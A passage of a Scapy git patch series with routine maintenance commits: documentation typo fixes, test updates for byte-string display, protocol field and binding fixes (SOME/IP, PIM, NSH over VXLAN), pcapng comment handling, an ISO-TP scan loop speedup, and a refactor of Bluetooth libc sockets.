ICMPv6NDOptCaptivePortal(b"\x25\x03https://example.com\x00\x00\x00") +p.type == 37 and p.len == 3 and p.URI == b"https://example.com" + += ICMPv6NDOptCaptivePortal - Dissection with zero length +p = ICMPv6NDOptCaptivePortal(b"\x25\x00abcdefgh") +p.type == 37 and p.len == 0 and p.URI == b"abcdef" and Raw in p and len(p[Raw]) == 2 + += ICMPv6NDOptCaptivePortal - Summary Output +ICMPv6NDOptCaptivePortal(URI="https://example.com").mysummary() == "ICMPv6 Neighbor Discovery Option - Captive-Portal Option 'https://example.com'" + + ############ ############ + ICMPv6NDOptEFA Class Test From 171037c5bee37f197abc586098532847cd4dc73d Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Andr=C3=A9=20David?= Date: Mon, 10 Jul 2023 18:43:51 +0200 Subject: [PATCH 1054/1632] Small typos in usage.rst (#4052) --- doc/scapy/usage.rst | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/doc/scapy/usage.rst b/doc/scapy/usage.rst index 1e6c1e37842..f377259d126 100644 --- a/doc/scapy/usage.rst +++ b/doc/scapy/usage.rst @@ -784,7 +784,7 @@ Advanced Sniffing - Sniffing Sessions Scapy includes some basic Sessions, but it is possible to implement your own. Available by default: -- :py:class:`~scapy.sessions.IPSession` -> *defragment IP packets* on-the-flow, to make a stream usable by ``prn``. +- :py:class:`~scapy.sessions.IPSession` -> *defragment IP packets* on-the-fly, to make a stream usable by ``prn``. - :py:class:`~scapy.sessions.TCPSession` -> *defragment certain TCP protocols*. Currently supports: - HTTP 1.0 - TLS @@ -1798,7 +1798,7 @@ Scapy dissects slowly and/or misses packets under heavy loads. .. note:: - Please bare in mind that Scapy is not designed to be blazing fast, but rather easily hackable & extensible. The packet model makes it VERY easy to create new layers, compared to pretty much all other alternatives, but comes with a performance cost. Of course, we still do our best to make Scapy as fast as possible, but it's not the absolute main goal. + Please bear in mind that Scapy is not designed to be blazing fast, but rather easily hackable & extensible. The packet model makes it VERY easy to create new layers, compared to pretty much all other alternatives, but comes with a performance cost. Of course, we still do our best to make Scapy as fast as possible, but it's not the absolute main goal. Solution ^^^^^^^^ From ca57be524fccd648f4f923ef12be20adcd30aa14 Mon Sep 17 00:00:00 2001 From: gpotter2 <10530980+gpotter2@users.noreply.github.com> Date: Mon, 10 Jul 2023 21:10:06 +0200 Subject: [PATCH 1055/1632] Create .git-blame-ignore-revs (#4063) --- .git-blame-ignore-revs | 51 ++++++++++++++++++++++++++++++++++++++++++ 1 file changed, 51 insertions(+) create mode 100644 .git-blame-ignore-revs diff --git a/.git-blame-ignore-revs b/.git-blame-ignore-revs new file mode 100644 index 00000000000..d1ab8e752f9 --- /dev/null +++ b/.git-blame-ignore-revs @@ -0,0 +1,51 @@ +# This file contains the list of commits that should be excluded from +# git blame. Read more informations on: +# https://docs.github.com/en/repositories/working-with-files/using-files/viewing-a-file#ignore-commits-in-the-blame-view + +# PEPin - https://github.com/secdev/scapy/issues/1277 +# E231 - missing whitespace after ',' +e7365b2baeded1a0e1e3b59bc0ad14a78d6e3086 +# E30* - Incorrect number of blank lines +b770bbc58c26437b354c0bd21dc4e2fcfa3abfdf +# E20* - Incorrect number of whitespace +6861a35d8ed4466df7b2ff82341e60caf9ff869a +# E12* - visual indent +275ad3246b5231bb046a66bcfdf3654d67fdea20 +# W29* - useless whitespaces +453f2592f7b6f2b8677619769f8427932894dc1c +# E251 - unexpected spaces around keyword / parameter equals +203254afd771b42ccf0fcca96ba92dc4075cfe4a +# E26 - comments +b7a3db73dfd17ec1e7bbace8d52464982bf8ea8d +# E1 - incorrect indentation +f2f1de742aa36167e2c86247a26ed5e7393366ea +# F821 - undefined name 'name' +f8525ea9f17cedf148febcab8d1dab51ddca9afe +# E2* - whitespaces errors +1c2fe99c131bb05e009896410766371a2f870175 +# E71* - tests syntax +927c157b58918d5fdce9714a3c35627339cc8657 +# F841 - local variable 'name' is assigned to but never used +dbe409531a22d1245cf4669f72a425b42c83b0db +# PEPin several fixes +93232490193ca2b59e3b1425131913d28f408f7a +# E501 - line too long (> 79 characters) +e89d8965748439adc253714316de7a9a35b8bd73 +# F601 - dictionary key repeated with different values +0fd7d76550e56831f887664202d743846d3619dd +# F811 - redefinition of unused variable/class/... +10454d1ca243d0fd8d2ab4a148d688e3ea916e49 +# E402 - module level import not at top of file +0f4a904d2801e8bbbc82880345ad453ceb6ee34f +# E722 - do not use bare except +a35575ff22da176a8b515405faea9a689462da0c +# E741 - ambiguous variable name 'l' +7c61676aef950ca268eac480902dd91cb0abe3a4 +# F405 - variable/function/... may be undefined, or defined from star +8773983edb0336db7aa84777dee2aa9892508418 +# F401 - 'module' imported but unused +a58e1b90a704c394216a0b5a864a50931754bdf7 +# W502 - line break before binary operator +9687222c3f0af6ef89ecfe15e5b983e1f7b5b31e +# E275 - Missing whitespace after keyword +08b1f9d67c8e716fd44036a027bdc90dcb9fcfdf From 9abb9cb6dddfaef2af5b15c44d451ed63cb26bfc Mon Sep 17 00:00:00 2001 From: haradama Date: Sat, 8 Jul 2023 20:06:57 +0900 Subject: [PATCH 1056/1632] Update SD class to support Explicit Initial Data Control Flag --- scapy/contrib/automotive/someip.py | 3 ++- test/contrib/automotive/someip.uts | 9 ++++++++- 2 files changed, 10 insertions(+), 2 deletions(-) diff --git a/scapy/contrib/automotive/someip.py b/scapy/contrib/automotive/someip.py index 1bb491644bc..32b64376322 100644 --- a/scapy/contrib/automotive/someip.py +++ b/scapy/contrib/automotive/someip.py @@ -432,7 +432,8 @@ class SD(_SDPacketBase): _sdFlag = collections.namedtuple('Flag', 'mask offset') FLAGSDEF = { "REBOOT": _sdFlag(mask=0x80, offset=7), - "UNICAST": _sdFlag(mask=0x40, offset=6) + "UNICAST": _sdFlag(mask=0x40, offset=6), + "EXPLICIT_INITIAL_DATA_CONTROL": _sdFlag(mask=0x20, offset=5), } name = "SD" diff --git a/test/contrib/automotive/someip.uts b/test/contrib/automotive/someip.uts index 183b2202f1c..37b32e85d12 100644 --- a/test/contrib/automotive/someip.uts +++ b/test/contrib/automotive/someip.uts @@ -208,9 +208,16 @@ assert p.flags == 0x40 p.set_flag("UNICAST", 0) assert p.flags == 0x00 +p.set_flag("EXPLICIT_INITIAL_DATA_CONTROL", 1) +assert p.flags == 0x20 + +p.set_flag("EXPLICIT_INITIAL_DATA_CONTROL", 0) +assert p.flags == 0x00 + p.set_flag("REBOOT", 1) p.set_flag("UNICAST", 1) -assert p.flags == 0xc0 +p.set_flag("EXPLICIT_INITIAL_DATA_CONTROL", 1) +assert p.flags == 0xe0 + SD Get SOME/IP Packet From 5216e25cbcaaefd079fdaa563996b4cd00cabb24 Mon Sep 17 00:00:00 2001 From: Aniket Gargya Date: Thu, 13 Jul 2023 11:15:19 -0500 Subject: [PATCH 1057/1632] Add bufsz parameter to RawPcapWriter constructor (#4067) --- scapy/utils.py | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/scapy/utils.py b/scapy/utils.py index b882b01f923..3c1b85acb4d 100644 --- a/scapy/utils.py +++ b/scapy/utils.py @@ -1939,6 +1939,7 @@ def __init__(self, sync=False, # type: bool nano=False, # type: bool snaplen=MTU, # type: int + bufsz=4096, # type: int ): # type: (...) -> None """ @@ -1963,7 +1964,6 @@ def __init__(self, self.endian = endianness self.sync = sync self.nano = nano - bufsz = 4096 if sync: bufsz = 0 From 9a1675e7b74ba85373668ceef0c4025bb8a9c4ba Mon Sep 17 00:00:00 2001 From: Evgeny Vereshchagin Date: Tue, 2 May 2023 22:00:00 +0000 Subject: [PATCH 1058/1632] Turn PIMv2HelloLANPruneDelayValue.t into BitField to make its repr work. It's just one bit so FlagsField isn't suitable there. Fixes: ``` >>> repr(PIMv2HelloLANPruneDelayValue(t=1)) Traceback (most recent call last): File "", line 2, in File "scapy/packet.py", line 563, in __repr__ val = f.i2repr(self, fval) ^^^^^^^^^^^^^^^^^^^^ File "scapy/fields.py", line 3092, in i2repr return "None" if x is None else str(self._fixup_val(x)) ^^^^^^^^^^^^^^^^^^^^^^^ File "scapy/fields.py", line 2947, in __str__ return ("+" if self.multi else "").join(r) ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ TypeError: sequence item 0: expected str instance, int found ``` It's a follow-up to 6e205b21608f1672a01ce2e186526fd117ac7397 --- scapy/contrib/pim.py | 4 ++-- test/contrib/pim.uts | 2 ++ 2 files changed, 4 insertions(+), 2 deletions(-) diff --git a/scapy/contrib/pim.py b/scapy/contrib/pim.py index ec716f4cb36..e4f91a00697 100644 --- a/scapy/contrib/pim.py +++ b/scapy/contrib/pim.py @@ -13,7 +13,7 @@ from scapy.packet import Packet, bind_layers from scapy.fields import BitFieldLenField, BitField, BitEnumField, ByteField, \ ShortField, XShortField, IPField, PacketListField, \ - IntField, FieldLenField, BoundStrLenField, FlagsField + IntField, FieldLenField, BoundStrLenField from scapy.layers.inet import IP from scapy.utils import checksum from scapy.compat import orb @@ -114,7 +114,7 @@ class PIMv2HelloHoldtime(_PIMv2GenericHello): class PIMv2HelloLANPruneDelayValue(_PIMv2GenericHello): name = "PIMv2 Hello Options : LAN Prune Delay Value" fields_desc = [ - FlagsField("t", 0, 1, [0, 1]), + BitField("t", 0, 1), BitField("propagation_delay", 500, 15), ShortField("override_interval", 2500), ] diff --git a/test/contrib/pim.uts b/test/contrib/pim.uts index 7fbba92a565..8aa4f7e2b1c 100644 --- a/test/contrib/pim.uts +++ b/test/contrib/pim.uts @@ -24,6 +24,8 @@ assert (hello_pkt[PIMv2Hello].option[2][PIMv2HelloLANPruneDelay].value[0][PIMv2H assert (hello_pkt[PIMv2Hello].option[2][PIMv2HelloLANPruneDelay].value[0][PIMv2HelloLANPruneDelayValue].override_interval == 2500) assert (hello_pkt[PIMv2Hello].option[3][PIMv2HelloGenerationID].type == 20) +repr(PIMv2HelloLANPruneDelayValue(t=1)) + = PIMv2 Join/Prune - instantiation jp_data = b'\x01\x00^\x00\x00\r\x00\xd0\xcb\x00\xba\xe4\x08\x00E\xc0\x00rY\xfb\x00\x00\x01gT3\x15\x15\x15\x15\xe0\x00\x00\r#\x00\x1b\x18\x01\x00\x15\x15\x15\x16\x00\x04\x00\xd2\x01\x00\x00 \xef\x01\x01\x0b\x00\x01\x00\x00\x01\x00\x07 \x16\x16\x16\x15\x01\x00\x00 \xef\x01\x01\x0c\x00\x01\x00\x00\x01\x00\x07 \x16\x16\x16\x15\x01\x00\x00 \xef\x01\x01\x0b\x00\x00\x00\x01\x01\x00\x07 \x16\x16\x16\x15\x01\x00\x00 \xef\x01\x01\x0c\x00\x00\x00\x01\x01\x00\x07 \x16\x16\x16\x15' From 98f5ed2a67f41f8f028539d59a808caaff10a6ed Mon Sep 17 00:00:00 2001 From: Tera <24725862+teraa@users.noreply.github.com> Date: Sun, 18 Jun 2023 22:05:57 +0200 Subject: [PATCH 1059/1632] fix param name in docstring Docstring incorrectly refers to the `proto` param of `in4_chksum` method as `nh` Submitting this PR again because I deleted the fork before PR was merged. --- scapy/layers/inet.py | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/scapy/layers/inet.py b/scapy/layers/inet.py index 6b0e64dcdc4..95c07073800 100644 --- a/scapy/layers/inet.py +++ b/scapy/layers/inet.py @@ -693,7 +693,7 @@ def in4_chksum(proto, u, p): # type: (int, IP, bytes) -> int """IPv4 Pseudo Header checksum as defined in RFC793 - :param nh: value of upper layer protocol + :param proto: value of upper layer protocol :param u: upper layer instance :param p: the payload of the upper layer provided as a string """ From 36a7b8772a7f5bd91045ebc11abdc9dd4bab181a Mon Sep 17 00:00:00 2001 From: Nils Weiss Date: Fri, 14 Jul 2023 17:05:25 +0200 Subject: [PATCH 1060/1632] Speedup isotp scan verification function (#4066) * Speedup isotp scan verification function * fix * fix flake --- scapy/contrib/isotp/isotp_scanner.py | 17 +++++++++-------- 1 file changed, 9 insertions(+), 8 deletions(-) diff --git a/scapy/contrib/isotp/isotp_scanner.py b/scapy/contrib/isotp/isotp_scanner.py index bfd4760fa08..15a53cd8feb 100644 --- a/scapy/contrib/isotp/isotp_scanner.py +++ b/scapy/contrib/isotp/isotp_scanner.py @@ -3,6 +3,7 @@ # See https://scapy.net/ for more information # Copyright (C) Nils Weiss # Copyright (C) Alexander Schroeder +import itertools import json # scapy.contrib.description = ISO-TP (ISO 15765-2) Scanner Utility # scapy.contrib.status = library @@ -203,16 +204,16 @@ def scan(sock, # type: SuperSocket return return_values cleaned_ret_val = dict() # type: Dict[int, Tuple[Packet, int]] - for tested_id in return_values.keys(): + retest_ids = list(set( + itertools.chain.from_iterable( + range(max(0, i - 2), i + 2) for i in return_values.keys()))) + for value in retest_ids: if stop_event is not None and stop_event.is_set(): break - for value in range(max(0, tested_id - 2), tested_id + 2, 1): - if stop_event is not None and stop_event.is_set(): - break - sock.send(get_isotp_packet(value, False, extended_can_id)) - sock.sniff(prn=lambda pkt: get_isotp_fc(value, cleaned_ret_val, - noise_ids, False, pkt), - timeout=sniff_time * 10, store=False) + sock.send(get_isotp_packet(value, False, extended_can_id)) + sock.sniff(prn=lambda pkt: get_isotp_fc(value, cleaned_ret_val, + noise_ids, False, pkt), + timeout=sniff_time * 10, store=False) return cleaned_ret_val From 10bceffd1b4f4d697ab42cf0b477f501c9b307d2 Mon Sep 17 00:00:00 2001 From: Nils Weiss Date: Fri, 14 Jul 2023 17:06:25 +0200 Subject: [PATCH 1061/1632] Improve display of bytes strings (#4062) * Fix #4044 * fix macsec.uts * fix sebek tests --- scapy/fields.py | 2 +- test/contrib/macsec.uts | 2 +- test/contrib/sebek.uts | 24 ++++++++++++------------ test/fields.uts | 2 +- 4 files changed, 15 insertions(+), 15 deletions(-) diff --git a/scapy/fields.py b/scapy/fields.py index bd031374a93..c3f02ff1a05 100644 --- a/scapy/fields.py +++ b/scapy/fields.py @@ -1430,7 +1430,7 @@ def any2i(self, pkt, x): def i2repr(self, pkt, x): # type: (Optional[Packet], I) -> str if isinstance(x, bytes): - return repr(plain_str(x)) + return repr(x) return super(_StrField, self).i2repr(pkt, x) def i2m(self, pkt, x): diff --git a/test/contrib/macsec.uts b/test/contrib/macsec.uts index dd0ab123cbd..218373e1fad 100755 --- a/test/contrib/macsec.uts +++ b/test/contrib/macsec.uts @@ -21,7 +21,7 @@ assert m[MACsec].SC assert m[MACsec].E assert m[MACsec].C assert m[MACsec].SCI == b'\x52\x54\x00\x13\x01\x56\x00\x01' -assert m[MACsec].mysummary() == r"AN=0, PN=100, SCI='RT\x00\x13\x01V\x00\x01', IPv4" +assert m[MACsec].mysummary() == r"AN=0, PN=100, SCI=b'RT\x00\x13\x01V\x00\x01', IPv4" = MACsec - basic encryption - encrypted sa = MACsecSA(sci=b'\x52\x54\x00\x13\x01\x56\x00\x01', an=0, pn=100, key=b'aaaaaaaaaaaaaaaa', icvlen=16, encrypt=1, send_sci=1) diff --git a/test/contrib/sebek.uts b/test/contrib/sebek.uts index f83eb1c1c3c..39ef69c3480 100644 --- a/test/contrib/sebek.uts +++ b/test/contrib/sebek.uts @@ -8,7 +8,7 @@ = Layer binding 1 pkt = IP() / UDP() / SebekHead() / SebekV1(cmd="diepotato") assert pkt.sport == pkt.dport == 1101 and pkt[SebekHead].version == 1 -assert pkt.summary() == "IP / UDP / SebekHead / Sebek v1 read ('diepotato')" +assert pkt.summary() == "IP / UDP / SebekHead / Sebek v1 read (b'diepotato')" = Packet dissection 1 pkt = IP(raw(pkt)) @@ -17,7 +17,7 @@ pkt.sport == pkt.dport == 1101 and pkt[SebekHead].version == 1 = Layer binding 2 pkt = IP() / UDP() / SebekHead() / SebekV2Sock(cmd="diepotato") assert pkt.sport == pkt.dport == 1101 and pkt[SebekHead].version == 2 and pkt[SebekHead].type ==2 -assert pkt.summary() == "IP / UDP / SebekHead / Sebek v2 socket ('diepotato')" +assert pkt.summary() == "IP / UDP / SebekHead / Sebek v2 socket (b'diepotato')" = Packet dissection 2 pkt = IP(raw(pkt)) @@ -26,7 +26,7 @@ pkt.sport == pkt.dport == 1101 and pkt[SebekHead].version == 2 and pkt[SebekHead = Layer binding 3 pkt = IPv6()/UDP()/SebekHead()/SebekV3() assert pkt.sport == pkt.dport == 1101 and pkt[SebekHead].version == 3 -assert pkt.summary() == "IPv6 / UDP / SebekHead / Sebek v3 read ('')" +assert pkt.summary() == "IPv6 / UDP / SebekHead / Sebek v3 read (b'')" = Packet dissection 3 pkt = IPv6(raw(pkt)) @@ -35,12 +35,12 @@ pkt.sport == pkt.dport == 1101 and pkt[SebekHead].version == 3 = Nonsense summaries assert SebekHead(version=2).summary() == "Sebek Header v2 read" -assert SebekV1(cmd="diepotato").summary() == "Sebek v1 ('diepotato')" -assert SebekV2(cmd="diepotato").summary() == "Sebek v2 ('diepotato')" -assert (SebekHead()/SebekV2(cmd="nottoday")).summary() == "SebekHead / Sebek v2 read ('nottoday')" -assert SebekV3(cmd="diepotato").summary() == "Sebek v3 ('diepotato')" -assert (SebekHead()/SebekV3(cmd="nottoday")).summary() == "SebekHead / Sebek v3 read ('nottoday')" -assert SebekV3Sock(cmd="diepotato").summary() == "Sebek v3 socket ('diepotato')" -assert (SebekHead()/SebekV3Sock(cmd="nottoday")).summary() == "SebekHead / Sebek v3 socket ('nottoday')" -assert SebekV2Sock(cmd="diepotato").summary() == "Sebek v2 socket ('diepotato')" -assert (SebekHead()/SebekV2Sock(cmd="nottoday")).summary() == "SebekHead / Sebek v2 socket ('nottoday')" +assert SebekV1(cmd="diepotato").summary() == "Sebek v1 (b'diepotato')" +assert SebekV2(cmd="diepotato").summary() == "Sebek v2 (b'diepotato')" +assert (SebekHead()/SebekV2(cmd="nottoday")).summary() == "SebekHead / Sebek v2 read (b'nottoday')" +assert SebekV3(cmd="diepotato").summary() == "Sebek v3 (b'diepotato')" +assert (SebekHead()/SebekV3(cmd="nottoday")).summary() == "SebekHead / Sebek v3 read (b'nottoday')" +assert SebekV3Sock(cmd="diepotato").summary() == "Sebek v3 socket (b'diepotato')" +assert (SebekHead()/SebekV3Sock(cmd="nottoday")).summary() == "SebekHead / Sebek v3 socket (b'nottoday')" +assert SebekV2Sock(cmd="diepotato").summary() == "Sebek v2 socket (b'diepotato')" +assert (SebekHead()/SebekV2Sock(cmd="nottoday")).summary() == "SebekHead / Sebek v2 socket (b'nottoday')" diff --git a/test/fields.uts b/test/fields.uts index b3f3cc6f1c2..0dfccfd1486 100644 --- a/test/fields.uts +++ b/test/fields.uts @@ -218,7 +218,7 @@ class TestStrField(Packet): p = TestStrField(s1="cafe", s2="deadbeef") assert raw(p) == b'\x04\x00cafedeadbeef' print(p.sprintf("%s1% %s2%")) -assert p.sprintf("%s1% %s2%") == "'cafe' 'deadbeef'" +assert p.sprintf("%s1% %s2%") == "b'cafe' b'deadbeef'" = StrFieldUtf16 From f19d36ff8221cd7b7b14eff7ef9ba5776291f9d5 Mon Sep 17 00:00:00 2001 From: gpotter2 <10530980+gpotter2@users.noreply.github.com> Date: Sat, 15 Jul 2023 00:11:57 +0200 Subject: [PATCH 1062/1632] Fix tiny issue in inet6.uts --- test/scapy/layers/inet6.uts | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/test/scapy/layers/inet6.uts b/test/scapy/layers/inet6.uts index 18d19babc1d..b9f78a0b9ce 100644 --- a/test/scapy/layers/inet6.uts +++ b/test/scapy/layers/inet6.uts @@ -1235,7 +1235,7 @@ p = ICMPv6NDOptCaptivePortal(b"\x25\x00abcdefgh") p.type == 37 and p.len == 0 and p.URI == b"abcdef" and Raw in p and len(p[Raw]) == 2 = ICMPv6NDOptCaptivePortal - Summary Output -ICMPv6NDOptCaptivePortal(URI="https://example.com").mysummary() == "ICMPv6 Neighbor Discovery Option - Captive-Portal Option 'https://example.com'" +ICMPv6NDOptCaptivePortal(URI="https://example.com").mysummary() == "ICMPv6 Neighbor Discovery Option - Captive-Portal Option b'https://example.com'" ############ From 5bc8fc9c1d3a4f2b078d4f6e0820650dc5c114e0 Mon Sep 17 00:00:00 2001 From: Raslan Darawsheh Date: Mon, 17 Jul 2023 16:26:25 +0300 Subject: [PATCH 1063/1632] NSH: fix layer binding for VXLAN GPE (#4054) Use correct field name to bind VXLAN GPE Signed-off-by: Raslan Darawsheh --- scapy/contrib/nsh.py | 2 +- test/contrib/nsh.uts | 4 ++++ 2 files changed, 5 insertions(+), 1 deletion(-) diff --git a/scapy/contrib/nsh.py b/scapy/contrib/nsh.py index aed7a37a619..8175e9a7627 100644 --- a/scapy/contrib/nsh.py +++ b/scapy/contrib/nsh.py @@ -75,7 +75,7 @@ def mysummary(self): bind_layers(Ether, NSH, {'type': 0x894F}, type=0x894F) -bind_layers(VXLAN, NSH, {'flags': 0xC, 'nextproto': 4}, nextproto=4) +bind_layers(VXLAN, NSH, {'flags': 0xC, 'NextProtocol': 4}, NextProtocol=4) bind_layers(GRE, NSH, {'proto': 0x894F}, proto=0x894F) bind_layers(NSH, IP, nextproto=1) diff --git a/test/contrib/nsh.uts b/test/contrib/nsh.uts index 5c8f3ac6e4b..0751edd1338 100644 --- a/test/contrib/nsh.uts +++ b/test/contrib/nsh.uts @@ -14,3 +14,7 @@ raw(Ether(src="00:00:00:00:00:01", dst="00:00:00:00:00:02")/IP(src="1.1.1.1", ds = 0 length variable length context header NSH raw(NSH(mdtype=2, spi=0xF0F0F0, si=0xFF)) == b'\x0f\xc2\x02\x03\xf0\xf0\xf0\xff' + += Build a NSH over VXLAN packet and verify bindings +raw(Ether(dst='0c:42:a1:5f:fb:e0', src='b8:59:9f:cd:de:3e')/IPv6(src='::1', dst='::2')/UDP(sport=10, dport=8472)/VXLAN(NextProtocol=4, vni=4660)/NSH()/NSH()/Ether(dst='0c:42:a1:5f:fb:e4', src='b8:59:9f:cd:de:33')/IP(src='10.200.100.10', dst='2.2.2.3')/TCP(sport=123, dport=333)) == b'\x0cB\xa1_\xfb\xe0\xb8Y\x9f\xcd\xde>\x86\xdd`\x00\x00\x00\x00v\x11@\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\n!\x18\x00v\x05F\x0c\x00\x00\x04\x00\x124\x00\x0f\xc6\x01\x04\x00\x00\x00\xff\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0f\xc6\x01\x03\x00\x00\x00\xff\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0cB\xa1_\xfb\xe4\xb8Y\x9f\xcd\xde3\x08\x00E\x00\x00(\x00\x01\x00\x00@\x06\x07\xf9\n\xc8d\n\x02\x02\x02\x03\x00{\x01M\x00\x00\x00\x00\x00\x00\x00\x00P\x02 \x00\x1bD\x00\x00' + From eb3658d5b1537ebdef8312d71403a10eb0e3ce07 Mon Sep 17 00:00:00 2001 From: Nathan Korth Date: Tue, 18 Jul 2023 05:23:36 -0400 Subject: [PATCH 1064/1632] Don't require newline at end of pcapng comment (#4021) I couldn't find anything in the spec about requiring this. --- scapy/utils.py | 9 +-------- test/regression.uts | 2 +- 2 files changed, 2 insertions(+), 9 deletions(-) diff --git a/scapy/utils.py b/scapy/utils.py index 3c1b85acb4d..1b58464f343 100644 --- a/scapy/utils.py +++ b/scapy/utils.py @@ -1553,12 +1553,7 @@ def _read_options(self, options): tsresol & 127 ) if code == 1 and length >= 1 and 4 + length < len(options): - comment = options[4:4 + length] - newline_index = comment.find(b"\n") - if newline_index == -1: - warning("PcapNg: invalid comment option") - break - opts["comment"] = comment[:newline_index] + opts["comment"] = options[4:4 + length] if code == 0: if length != 0: warning("PcapNg: invalid option length %d for end-of-option" % length) # noqa: E501 @@ -2210,8 +2205,6 @@ def _write_block_epb(self, comment_opt = None if comment: comment = bytes_encode(comment) - if not comment.endswith(b"\n"): - comment += b"\n" comment_opt = struct.pack(self.endian + "HH", 1, len(comment)) # Pad Option Value to 32 bits diff --git a/test/regression.uts b/test/regression.uts index ed0e8a26bef..eb51d61863a 100644 --- a/test/regression.uts +++ b/test/regression.uts @@ -1961,7 +1961,7 @@ p = Ether() / IPv6() / TCP() p.comment = b"Hello Scapy!" wrpcapng(tmpfile, p) l = rdpcap(tmpfile) -assert l[0].comment.strip() == p.comment +assert l[0].comment == p.comment = Read a pcap file with wirelen != captured len pktpcapwirelen = rdpcap(pcapwirelenfile) From 7d31fcc9187afaa11756bc4cec516fa702c59f90 Mon Sep 17 00:00:00 2001 From: Antonio Vazquez Date: Thu, 20 Jul 2023 19:14:36 +0200 Subject: [PATCH 1065/1632] Refactor libc sockets and add BluetoothMonitorSocket (#4042) MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit Signed-off-by: Antonio Vázquez Blanco --- doc/scapy/layers/bluetooth.rst | 20 +++++- scapy/layers/bluetooth.py | 125 +++++++++++++++++++++++---------- 2 files changed, 106 insertions(+), 39 deletions(-) diff --git a/doc/scapy/layers/bluetooth.rst b/doc/scapy/layers/bluetooth.rst index 1e8b0c69161..c9c4a535e1c 100644 --- a/doc/scapy/layers/bluetooth.rst +++ b/doc/scapy/layers/bluetooth.rst @@ -71,12 +71,28 @@ There are multiple protocols available for Bluetooth through ``AF_BLUETOOTH`` sockets: Host-controller interface (HCI) ``BTPROTO_HCI`` - Scapy class: ``BluetoothHCISocket`` - This is the "base" level interface for communicating with a Bluetooth controller. Everything is built on top of this, and this represents about as close to the physical layer as one can get with regular Bluetooth hardware. + Scapy class: ``BluetoothMonitorSocket`` + + Allows to capture all HCI transactions that are taking place over all HCI + interfaces (including in BlueZ core). It is intended to perform monitoring of + transactions, device attachment and removal, BlueZ logging... + + Scapy class: ``BluetoothUserSocket`` + + This socket interacts with a Bluetooth controller with complete and exclusive + control of de device. This means that BlueZ will not try to take control of + the interface and will not help you manage connections via this interface. + + Scapy class: ``BluetoothHCISocket`` + + Using HCI protocol, this socket interacts with a Bluetooth controller but + does not have exclusive control over it, allowing BlueZ and other + applications to still use the adapter to communicate with devices. + Logical Link Control and Adaptation Layer Protocol (L2CAP) ``BTPROTO_L2CAP`` Scapy class: ``BluetoothL2CAPSocket`` diff --git a/scapy/layers/bluetooth.py b/scapy/layers/bluetooth.py index 74aa01c1434..8411d3b38ec 100644 --- a/scapy/layers/bluetooth.py +++ b/scapy/layers/bluetooth.py @@ -52,6 +52,20 @@ from scapy.error import warning +############ +# Consts # +############ + +# From hci.h +HCI_CHANNEL_RAW = 0 +HCI_CHANNEL_USER = 1 +HCI_CHANNEL_MONITOR = 2 +HCI_CHANNEL_CONTROL = 3 +HCI_CHANNEL_LOGGING = 4 + +HCI_DEV_NONE = 0xffff + + ########## # Layers # ########## @@ -173,6 +187,18 @@ class HCI_PHDR_Hdr(Packet): } +class BT_Mon_Hdr(Packet): + ''' + Bluetooth Linux Monitor Transport Header + ''' + name = 'Bluetooth Linux Monitor Transport Header' + fields_desc = [ + LEShortField('opcode', None), + LEShortField('adapter_id', None), + LEShortField('len', None) + ] + + class HCI_Hdr(Packet): name = "HCI header" fields_desc = [ByteEnumField("type", 2, _bluetooth_packet_types)] @@ -1493,20 +1519,15 @@ class sockaddr_hci(ctypes.Structure): ] -class BluetoothUserSocket(SuperSocket): - desc = "read/write H4 over a Bluetooth user channel" - - def __init__(self, adapter_index=0): +class _BluetoothLibcSocket(SuperSocket): + def __init__(self, socket_domain, socket_type, socket_protocol, sock_address): + # type: (int, int, int, sockaddr_hci) -> None if WINDOWS: warning("Not available on Windows") return - # s = socket.socket(socket.AF_BLUETOOTH, socket.SOCK_RAW, socket.BTPROTO_HCI) # noqa: E501 - # s.bind((0,1)) - - # yeah, if only - # thanks to Python's weak ass socket and bind implementations, we have - # to call down into libc with ctypes - + # Python socket and bind implementations do not allow us to pass down + # the correct parameters. We must call libc functions directly via + # ctypes. sockaddr_hcip = ctypes.POINTER(sockaddr_hci) ctypes.cdll.LoadLibrary("libc.so.6") libc = ctypes.CDLL("libc.so.6") @@ -1521,40 +1542,24 @@ def __init__(self, adapter_index=0): ctypes.c_int) bind.restype = ctypes.c_int - ######## - # actual code - - s = socket_c(31, 3, 1) # (AF_BLUETOOTH, SOCK_RAW, HCI_CHANNEL_USER) + # Socket + s = socket_c(socket_domain, socket_type, socket_protocol) if s < 0: - raise BluetoothSocketError("Unable to open PF_BLUETOOTH socket") + raise BluetoothSocketError( + f"Unable to open socket({socket_domain}, {socket_type}, " + f"{socket_protocol})") - sa = sockaddr_hci() - sa.sin_family = 31 # AF_BLUETOOTH - sa.hci_dev = adapter_index # adapter index - sa.hci_channel = 1 # HCI_USER_CHANNEL - - r = bind(s, sockaddr_hcip(sa), sizeof(sa)) + # Bind + r = bind(s, sockaddr_hcip(sock_address), sizeof(sock_address)) if r != 0: raise BluetoothSocketError("Unable to bind") self.hci_fd = s - self.ins = self.outs = socket.fromfd(s, 31, 3, 1) - - def send_command(self, cmd): - opcode = cmd.opcode - self.send(cmd) - while True: - r = self.recv() - if r.type == 0x04 and r.code == 0xe and r.opcode == opcode: - if r.status != 0: - raise BluetoothCommandError("Command %x failed with %x" % (opcode, r.status)) # noqa: E501 - return r - - def recv(self, x=MTU): - return HCI_Hdr(self.ins.recv(x)) + self.ins = self.outs = socket.fromfd( + s, socket_domain, socket_type, socket_protocol) def readable(self, timeout=0): - (ins, outs, foo) = select.select([self.ins], [], [], timeout) + (ins, _, _) = select.select([self.ins], [], [], timeout) return len(ins) > 0 def flush(self): @@ -1582,6 +1587,52 @@ def close(self): close(self.hci_fd) +class BluetoothUserSocket(_BluetoothLibcSocket): + desc = "read/write H4 over a Bluetooth user channel" + + def __init__(self, adapter_index=0): 